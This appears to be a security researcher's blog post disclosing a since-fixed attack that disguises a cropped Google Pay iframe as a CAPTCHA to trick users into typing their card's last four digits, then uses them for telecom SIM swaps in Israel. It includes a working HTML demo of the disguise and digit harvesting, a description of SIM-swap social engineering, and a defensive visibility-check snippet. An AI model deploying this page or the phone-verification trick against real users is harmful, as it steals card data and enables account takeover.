It starts with something simple: a CAPTCHA box on your screen. You type the number you see, because of course you do. That’s what humans do online. But what if that “CAPTCHA” wasn’t a CAPTCHA at all?
In this post, I’ll walk you through how old data leaks, lazy telecom verification, and a vulnerability in a trusted Google Pay button can be chained together into a SIM swap attack, and why your own instincts make you the perfect accomplice.
The Four Digits Hiding in Google Pay’s Button
My research into Google Pay is not my first look at what can be done with a harmless looking iframe. Back in 2021, I wrote about an attack I called The Human Side Channel, which used the Facebook Like button to determine whether a user liked a specific page. By cropping, scaling, and styling the iframe, I could isolate a single pixel in the icon that changed color depending on the button’s state. With some creative interaction design, I could trick the user into revealing that state without them realizing it.
The same principle applies in this new attack. The Same Origin Policy prevents reading cross-origin content with JavaScript, but it does not stop you from displaying it on the screen and styling it. If you can predict where sensitive information will appear inside an iframe, you can design an interface that persuades the user to expose it for you.
I found that Google Pay’s “Pay” button is a perfect candidate for this. The button is served inside an iframe from a Google domain, and if you are logged in with a saved payment card, it shows the last four digits of that card in plain text. This behavior was consistent across desktop browsers and Android devices, making the attack effective on both. That detail might seem harmless in the context of a legitimate checkout, but it becomes a serious privacy issue when someone frames it in the wrong context.
Turning the Google Pay Button into a “CAPTCHA”
Once you know exactly where those four digits appear inside the iframe, it is simply a matter of presentation. With CSS, the iframe can be cropped so only the numbers are visible and then scaled up to make them prominent. Styling them as part of a CAPTCHA makes them feel legitimate.
To make the illusion convincing, I added two extra digits, one before and one after the real four, so the user saw something like “7 1234 9.” The outer digits were meaningless, but the middle four came directly from Google Pay. A layer of distortion and background noise generated with SVG filters completed the disguise, giving the image the irregular, imperfect look we associate with CAPTCHA challenges.
For the victim, it appeared to be a simple request to solve a CAPTCHA. For the attacker, it was a direct way to obtain the last four digits of the victim’s credit card.
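The crop-and-scale framing described above, as an added demo page that is not part of the original post and not Google's code. The "widget" is a constructed stand-in rendered through srcdoc, not the real Google Pay button, and the crop offsets (118px, 8px) and 56x24 region are assumptions chosen to match where the stand-in draws its digits; against a real target they would have to be measured from its rendered layout. The same CSS works on a cross-origin frame, because the embedding page is styling the iframe element, not its contents.

```html
<!DOCTYPE html>
<!-- Added demo (not the original post's code). The framed "widget" is a
     constructed stand-in via srcdoc; a real attack would point the iframe at
     a third-party button and use measured offsets instead of the assumed ones. -->
<html lang="en">
<head>
<meta charset="utf-8">
<title>Security check</title>
<style>
  /* Shell that makes decoys + cropped frame read as one distorted image */
  .captcha {
    display: inline-flex; align-items: center; gap: 6px;
    padding: 6px 10px; background: #eee; border: 1px solid #aaa;
    filter: url(#captcha-noise);   /* SVG distortion over everything inside */
    pointer-events: none;          /* victim cannot accidentally click the widget */
  }
  .decoy { font: bold 48px/1 monospace; color: #222; }

  /* Crop window: only a 56x24 region of the widget (at 3x) is visible.
     ASSUMED coordinates, chosen for the stand-in widget below. */
  .crop { width: 168px; height: 72px; overflow: hidden; position: relative; }
  .crop iframe {
    position: absolute; left: 0; top: 0; border: 0;
    width: 300px; height: 60px;
    transform-origin: 0 0;
    /* translate pans the frame so the digits sit at (0,0), scale enlarges them */
    transform: scale(3) translate(-118px, -8px);
  }
</style>
</head>
<body>
<p>Type the characters you see to continue:</p>
<div class="captcha">
  <span class="decoy">7</span>
  <div class="crop">
    <!-- Stand-in for the third-party button. The "1234" span is placed at a
         known offset (120px, 10px) so the crop window above lands on it. -->
    <iframe scrolling="no" srcdoc='
      <body style="margin:0;font-family:sans-serif">
        <div style="width:200px;height:40px;position:relative;background:#fff;color:#000;border:1px solid #000;border-radius:4px">
          <span style="position:absolute;left:12px;top:12px;font-size:14px">Pay with card</span>
          <span style="position:absolute;left:120px;top:10px;font:20px/1 monospace">1234</span>
        </div>
      </body>'></iframe>
  </div>
  <span class="decoy">9</span>
</div>
<p><input id="answer" maxlength="6" placeholder="6 characters"> <button onclick="harvest()">Verify</button></p>

<!-- Noise + displacement filter that gives the composite its uneven CAPTCHA look -->
<svg width="0" height="0" aria-hidden="true">
  <filter id="captcha-noise">
    <feTurbulence type="fractalNoise" baseFrequency="0.03" numOctaves="2" result="noise"/>
    <feDisplacementMap in="SourceGraphic" in2="noise" scale="5"/>
  </filter>
</svg>

<script>
  // The decoy digits are chosen by the attacker; positions 2..5 of what the
  // victim types are their transcription of the widget's own text.
  function harvest() {
    const typed = document.getElementById('answer').value.trim();
    if (typed.length !== 6) return;
    const lastFour = typed.slice(1, 5);
    console.log('harvested last four:', lastFour); // a real attacker would POST this
  }
</script>
</body>
</html>
```

Opening the file in a browser shows "7", the enlarged "1234" from the frame, and "9" under one noise filter; nothing in the page ever reads the frame's DOM, the victim does the reading. Replacing the srcdoc stand-in with a real cross-origin URL changes nothing in the CSS, only the offsets.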
A Real World Example: When Four Digits Decide Your Identity
In Israel, replacing a SIM card is surprisingly low tech. When you call your mobile provider to report a lost or stolen phone, the verification process often comes down to your full name, your national ID number, and the last four digits of your payment method.
On paper, this seems like a reasonable security policy. In practice, the first two checks are practically meaningless. Massive breaches, like the 2006 Agron leak or the 2020 Elector voter management app breach, have already put these identifiers in the public domain, allowing anyone to find Israeli names and ID numbers online.
The following is an AI-generated recording based on the transcript of a real phone call I had with a major telecom provider in Israel. I called from an unknown number, provided my ID number and the last four digits of the payment method, and the company agreed to send a replacement SIM card to any address I requested, without even deactivating the original.
Old Leaks, New Life on Telegram
To understand how old leaks stay dangerous, you have to see how they’ve been woven into daily life. In Tel Aviv, drug ads now come in the form of QR codes on street flyers, directing buyers to Telegram channels where cannabis and other substances can be ordered with a few taps. Behind the scenes, these markets run on bots that handle everything from reporting scams to flagging undercover police or recruiting couriers.
Illegal “Wolt Weed” ads openly promote drug delivery on the streets of Tel Aviv.
Translated image of the Telegram bot
The choice to make these bots publicly accessible, and advertised on street corners, isn’t just about convenience. Open access creates shared infrastructure that protects dealers and buyers from scams, while at the same time complicating law enforcement efforts. But it also normalizes the use of stolen identifiers, turning them into everyday tools in underground markets.
One of the most effective tactics in these channels is requiring buyers to provide a photo of their national ID card alongside a short verification video. This information can then be cross-referenced against the leaked databases. If the ID is fake, the inconsistency shows up quickly. And if the buyer turns out to be an undercover officer, the risk is even higher: their name, ID, and face can be exposed in the same Telegram channels, making anonymity almost impossible to maintain.
This normalization has a broader impact. In Israel, leaked national ID numbers are so widely available that they are effectively public. That reality underpins both drug trades and cybercrime: it enables dealers to verify buyers, and attackers to impersonate victims at telecom providers. Once names and IDs are treated as open information, the only real barrier left is the card digits, and that is where this Google Pay vulnerability comes into play.
Why This Matters Beyond Israel
Many carriers, banks, and online services worldwide still use the last four digits of a payment card for verification. If those digits are exposed, they can be enough to approve SIM swaps, account changes, or password resets.
Even when not used directly for authentication, they can act as a stable identifier for tracking and fingerprinting users across sites.
Closing Thoughts
We reported this issue to Google, and they acted quickly to remove the last four digits from the Google Pay button, effectively closing off this attack vector. Their swift response addressed the immediate risk, but the problem runs deeper than one iframe.
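For widgets that must keep displaying sensitive data inside an embeddable frame, one defensive check, as an added example that is not Google Pay's code and not from the original post: the widget withholds the field unless it can confirm it is being shown whole and unaltered. It assumes IntersectionObserver v2 (the trackVisibility/isVisible options), which at the time of writing is implemented only in Chromium-based browsers; elsewhere isVisible is undefined and only the clipping check applies. The sample value '1234' is constructed.

```html
<!DOCTYPE html>
<!-- Added example of a widget-side check; not the Google Pay button's code.
     Assumes IntersectionObserver v2 (Chromium). Fails closed: the digits are
     masked until the observer reports the widget fully visible and unaltered. -->
<html lang="en">
<head><meta charset="utf-8"><title>widget</title></head>
<body style="margin:0;font-family:sans-serif">
<div id="btn" style="width:200px;height:40px;line-height:40px;padding:0 12px;background:#000;color:#fff;border-radius:4px">
  Pay with <span id="last4">••••</span>
</div>
<script>
  const LAST4 = '1234';          // constructed sample value, shown only when safe
  const target = document.getElementById('btn');
  const field  = document.getElementById('last4');

  function render(ok) { field.textContent = ok ? LAST4 : '••••'; }

  if (!('IntersectionObserver' in window)) {
    render(false);               // cannot verify the rendering context: fail closed
  } else {
    const observer = new IntersectionObserver(entries => {
      const e = entries[entries.length - 1];
      // intersectionRatio < 1 means part of the widget is clipped, e.g. by an
      // overflow:hidden ancestor in the embedding page (the crop in the attack).
      // The intersection is computed through the frame hierarchy, so parent
      // clips count even though this page cannot read the parent's DOM.
      const whole = e.intersectionRatio >= 0.999;
      // isVisible (v2) is false when an ancestor applies filters, opacity,
      // non-proportional transforms, or content overlaps the widget. Plain
      // proportional upscaling passes, so this alone would not catch the crop.
      const unaltered = e.isVisible !== false;
      render(whole && unaltered);
    }, { threshold: [0, 0.5, 0.999, 1], trackVisibility: true, delay: 100 });
    observer.observe(target);
  }
</script>
</body>
</html>
```

delay must be at least 100 when trackVisibility is set, or Chromium rejects the options. The check is a mitigation for widgets that cannot remove the data; the robust fix remains the one Google applied, which is not to render the secret in an embeddable frame at all.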
Telecom providers, banks, and other services that still rely on the last four digits of a card for verification need to reconsider their processes. These digits are not secret: every time you make a payment online, the merchant (through Stripe or another payment processor) can typically see them. Treating them as trusted proof of identity only invites abuse.
In countries like Israel, where other personal identifiers have already been exposed, those digits may be the only barrier left. Strengthening verification beyond static, easily revealed data is essential to preventing the next variation of this attack.